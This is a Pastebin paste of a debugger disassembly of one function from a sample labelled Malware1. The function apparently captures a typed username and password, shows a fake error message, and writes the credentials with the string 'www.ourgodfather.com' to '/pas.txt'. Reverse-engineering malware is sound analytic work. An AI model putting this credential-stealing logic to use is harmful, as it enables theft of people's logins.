API tools faq
paste
Advertisement
d188878

malware1_funcb1

d188878
Feb 9th, 2019
138
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.91 KB | None | 0 0
raw download clone embed print report
  1. 0049642C /. 55 PUSH EBP
  2. 0049642D |. 8BEC MOV EBP,ESP
  3. 0049642F |. 81C4 20FEFFFF ADD ESP,-1E0
  4. 00496435 |. 53 PUSH EBX
  5. 00496436 |. 56 PUSH ESI
  6. 00496437 |. 33C9 XOR ECX,ECX
  7. 00496439 |. 898D 20FEFFFF MOV DWORD PTR SS:[EBP-1E0],ECX
  8. 0049643F |. 898D 28FEFFFF MOV DWORD PTR SS:[EBP-1D8],ECX
  9. 00496445 |. 898D 24FEFFFF MOV DWORD PTR SS:[EBP-1DC],ECX
  10. 0049644B |. 894D FC MOV DWORD PTR SS:[EBP-4],ECX
  11. 0049644E |. 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
  12. 00496451 |. 8BD8 MOV EBX,EAX
  13. 00496453 |. 8B35 48A04900 MOV ESI,DWORD PTR DS:[49A048] ; Malware1.0049C058
  14. 00496459 |. 33C0 XOR EAX,EAX
  15. 0049645B |. 55 PUSH EBP
  16. 0049645C |. 68 F6664900 PUSH Malware1.004966F6
  17. 00496461 |. 64:FF30 PUSH DWORD PTR FS:[EAX]
  18. 00496464 |. 64:8920 MOV DWORD PTR FS:[EAX],ESP
  19. 00496467 |. 8D95 28FEFFFF LEA EDX,DWORD PTR SS:[EBP-1D8]
  20. 0049646D |. 8B83 70030000 MOV EAX,DWORD PTR DS:[EBX+370]
  21. 00496473 |. E8 E8DAFBFF CALL Malware1.00453F60
  22. 00496478 |. 83BD 28FEFFFF >CMP DWORD PTR SS:[EBP-1D8],0
  23. 0049647F |. 75 34 JNZ SHORT Malware1.004964B5
  24. 00496481 |. 8D95 24FEFFFF LEA EDX,DWORD PTR SS:[EBP-1DC]
  25. 00496487 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
  26. 0049648D |. E8 CEDAFBFF CALL Malware1.00453F60
  27. 00496492 |. 83BD 24FEFFFF >CMP DWORD PTR SS:[EBP-1DC],0
  28. 00496499 |. 75 1A JNZ SHORT Malware1.004964B5
  29. 0049649B |. 6A 00 PUSH 0 ; /Arg1 = 00000000
  30. 0049649D |. 66:8B0D 046749>MOV CX,WORD PTR DS:[496704] ; |
  31. 004964A4 |. B2 02 MOV DL,2 ; |
  32. 004964A6 |. B8 10674900 MOV EAX,Malware1.00496710 ; |ASCII "The password field is empty, please type your password and try again.
  33.  
  34. Error Code: 8004882e"
  35. 004964AB |. E8 2CBEF9FF CALL Malware1.004322DC ; \Malware1.004322DC
  36. 004964B0 |. E9 0B020000 JMP Malware1.004966C0
  37. 004964B5 |> A1 F4A14900 MOV EAX,DWORD PTR DS:[49A1F4]
  38. 004964BA |. C600 01 MOV BYTE PTR DS:[EAX],1
  39. 004964BD |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  40. 004964BF |. 8B80 14030000 MOV EAX,DWORD PTR DS:[EAX+314]
  41. 004964C5 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  42. 004964C7 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  43. 004964CD |. 3C 01 CMP AL,1
  44. 004964CF |. 74 14 JE SHORT Malware1.004964E5
  45. 004964D1 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  46. 004964D3 |. 8B80 10030000 MOV EAX,DWORD PTR DS:[EAX+310]
  47. 004964D9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  48. 004964DB |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  49. 004964E1 |. 3C 01 CMP AL,1
  50. 004964E3 |. 75 0C JNZ SHORT Malware1.004964F1
  51. 004964E5 |> A1 B8A04900 MOV EAX,DWORD PTR DS:[49A0B8]
  52. 004964EA |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
  53. 004964EC |. E8 2FD4FDFF CALL Malware1.00473920
  54. 004964F1 |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
  55. 004964F3 |. 8B80 2C030000 MOV EAX,DWORD PTR DS:[EAX+32C]
  56. 004964F9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  57. 004964FB |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  58. 00496501 |. 3C 01 CMP AL,1
  59. 00496503 |. 74 28 JE SHORT Malware1.0049652D
  60. 00496505 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  61. 00496507 |. 8B80 24030000 MOV EAX,DWORD PTR DS:[EAX+324]
  62. 0049650D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  63. 0049650F |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  64. 00496515 |. 3C 01 CMP AL,1
  65. 00496517 |. 74 14 JE SHORT Malware1.0049652D
  66. 00496519 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  67. 0049651B |. 8B80 28030000 MOV EAX,DWORD PTR DS:[EAX+328]
  68. 00496521 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  69. 00496523 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  70. 00496529 |. 3C 01 CMP AL,1
  71. 0049652B |. 75 20 JNZ SHORT Malware1.0049654D
  72. 0049652D |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
  73. 0049652F |. 8B80 48030000 MOV EAX,DWORD PTR DS:[EAX+348]
  74. 00496535 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  75. 00496537 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  76. 0049653D |. 3C 01 CMP AL,1
  77. 0049653F |. 75 0C JNZ SHORT Malware1.0049654D
  78. 00496541 |. A1 A8A24900 MOV EAX,DWORD PTR DS:[49A2A8]
  79. 00496546 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
  80. 00496548 |. E8 F79DFDFF CALL Malware1.00470344
  81. 0049654D |> 8B83 04030000 MOV EAX,DWORD PTR DS:[EBX+304]
  82. 00496553 |. E8 30DFFBFF CALL Malware1.00454488
  83. 00496558 |. 8B83 0C030000 MOV EAX,DWORD PTR DS:[EBX+30C]
  84. 0049655E |. E8 2DDFFBFF CALL Malware1.00454490
  85. 00496563 |. 8D55 FC LEA EDX,DWORD PTR SS:[EBP-4]
  86. 00496566 |. 8B83 70030000 MOV EAX,DWORD PTR DS:[EBX+370]
  87. 0049656C |. E8 EFD9FBFF CALL Malware1.00453F60
  88. 00496571 |. 8D55 F8 LEA EDX,DWORD PTR SS:[EBP-8]
  89. 00496574 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
  90. 0049657A |. E8 E1D9FBFF CALL Malware1.00453F60
  91. 0049657F |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
  92. 00496582 |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
  93. 00496585 |. BA 78674900 MOV EDX,Malware1.00496778 ; ASCII "Username: "
  94. 0049658A |. E8 ADE6F6FF CALL Malware1.00404C3C
  95. 0049658F |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
  96. 00496592 |. 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8]
  97. 00496595 |. BA 8C674900 MOV EDX,Malware1.0049678C ; ASCII "Password: "
  98. 0049659A |. E8 9DE6F6FF CALL Malware1.00404C3C
  99. 0049659F |. 8B15 70A14900 MOV EDX,DWORD PTR DS:[49A170] ; Malware1.0049C274
  100. 004965A5 |. 8B12 MOV EDX,DWORD PTR DS:[EDX]
  101. 004965A7 |. 8D85 20FEFFFF LEA EAX,DWORD PTR SS:[EBP-1E0]
  102. 004965AD |. B9 A0674900 MOV ECX,Malware1.004967A0 ; ASCII "/pas.txt"
  103. 004965B2 |. E8 85E6F6FF CALL Malware1.00404C3C
  104. 004965B7 |. 8B95 20FEFFFF MOV EDX,DWORD PTR SS:[EBP-1E0]
  105. 004965BD |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  106. 004965C3 |. E8 4CC8F6FF CALL Malware1.00402E14
  107. 004965C8 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  108. 004965CE |. E8 DDC5F6FF CALL Malware1.00402BB0
  109. 004965D3 |. E8 E4C2F6FF CALL Malware1.004028BC
  110. 004965D8 |. BA B4674900 MOV EDX,Malware1.004967B4 ; ASCII "www.ourgodfather.com"
  111. 004965DD |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  112. 004965E3 |. E8 24EAF6FF CALL Malware1.0040500C
  113. 004965E8 |. E8 6BCEF6FF CALL Malware1.00403458
  114. 004965ED |. E8 CAC2F6FF CALL Malware1.004028BC
  115. 004965F2 |. 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
  116. 004965F5 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  117. 004965FB |. E8 0CEAF6FF CALL Malware1.0040500C
  118. 00496600 |. E8 53CEF6FF CALL Malware1.00403458
  119. 00496605 |. E8 B2C2F6FF CALL Malware1.004028BC
  120. 0049660A |. 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]
  121. 0049660D |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  122. 00496613 |. E8 F4E9F6FF CALL Malware1.0040500C
  123. 00496618 |. E8 3BCEF6FF CALL Malware1.00403458
  124. 0049661D |. E8 9AC2F6FF CALL Malware1.004028BC
  125. 00496622 |. BA B4674900 MOV EDX,Malware1.004967B4 ; ASCII "www.ourgodfather.com"
  126. 00496627 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  127. 0049662D |. E8 DAE9F6FF CALL Malware1.0040500C
  128. 00496632 |. E8 21CEF6FF CALL Malware1.00403458
  129. 00496637 |. E8 80C2F6FF CALL Malware1.004028BC
  130. 0049663C |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
  131. 00496642 |. E8 95C8F6FF CALL Malware1.00402EDC
  132. 00496647 |. E8 70C2F6FF CALL Malware1.004028BC
  133. 0049664C |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  134. 0049664E |. 8B80 74030000 MOV EAX,DWORD PTR DS:[EAX+374]
  135. 00496654 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  136. 00496656 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  137. 0049665C |. 3C 01 CMP AL,1
  138. 0049665E |. 75 05 JNZ SHORT Malware1.00496665
  139. 00496660 |. E8 87FBFFFF CALL Malware1.004961EC
  140. 00496665 |> 33D2 XOR EDX,EDX
  141. 00496667 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
  142. 0049666D |. E8 1ED9FBFF CALL Malware1.00453F90
  143. 00496672 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  144. 00496674 |. 8B80 48030000 MOV EAX,DWORD PTR DS:[EAX+348]
  145. 0049667A |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  146. 0049667C |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  147. 00496682 |. 84C0 TEST AL,AL
  148. 00496684 |. 75 3A JNZ SHORT Malware1.004966C0
  149. 00496686 |. 6A 00 PUSH 0 ; /Arg1 = 00000000
  150. 00496688 |. A1 089E4900 MOV EAX,DWORD PTR DS:[499E08] ; |
  151. 0049668D |. 8B00 MOV EAX,DWORD PTR DS:[EAX] ; |
  152. 0049668F |. 66:8B0D 046749>MOV CX,WORD PTR DS:[496704] ; |
  153. 00496696 |. B2 02 MOV DL,2 ; |
  154. 00496698 |. E8 3FBCF9FF CALL Malware1.004322DC ; \Malware1.004322DC
  155. 0049669D |. 48 DEC EAX
  156. 0049669E |. 75 20 JNZ SHORT Malware1.004966C0
  157. 004966A0 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
  158. 004966A2 |. 8B80 2C030000 MOV EAX,DWORD PTR DS:[EAX+32C]
  159. 004966A8 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
  160. 004966AA |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
  161. 004966B0 |. 84C0 TEST AL,AL
  162. 004966B2 |. 75 0C JNZ SHORT Malware1.004966C0
  163. 004966B4 |. A1 B8A04900 MOV EAX,DWORD PTR DS:[49A0B8]
  164. 004966B9 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
  165. 004966BB |. E8 60D2FDFF CALL Malware1.00473920
  166. 004966C0 |> 33C0 XOR EAX,EAX
  167. 004966C2 |. 5A POP EDX
  168. 004966C3 |. 59 POP ECX
  169. 004966C4 |. 59 POP ECX
  170. 004966C5 |. 64:8910 MOV DWORD PTR FS:[EAX],EDX
  171. 004966C8 |. 68 FD664900 PUSH Malware1.004966FD
  172. 004966CD |> 8D85 20FEFFFF LEA EAX,DWORD PTR SS:[EBP-1E0]
  173. 004966D3 |. E8 58E2F6FF CALL Malware1.00404930
  174. 004966D8 |. 8D85 24FEFFFF LEA EAX,DWORD PTR SS:[EBP-1DC]
  175. 004966DE |. BA 02000000 MOV EDX,2
  176. 004966E3 |. E8 6CE2F6FF CALL Malware1.00404954
  177. 004966E8 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
  178. 004966EB |. BA 02000000 MOV EDX,2
  179. 004966F0 |. E8 5FE2F6FF CALL Malware1.00404954
  180. 004966F5 \. C3 RETN
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!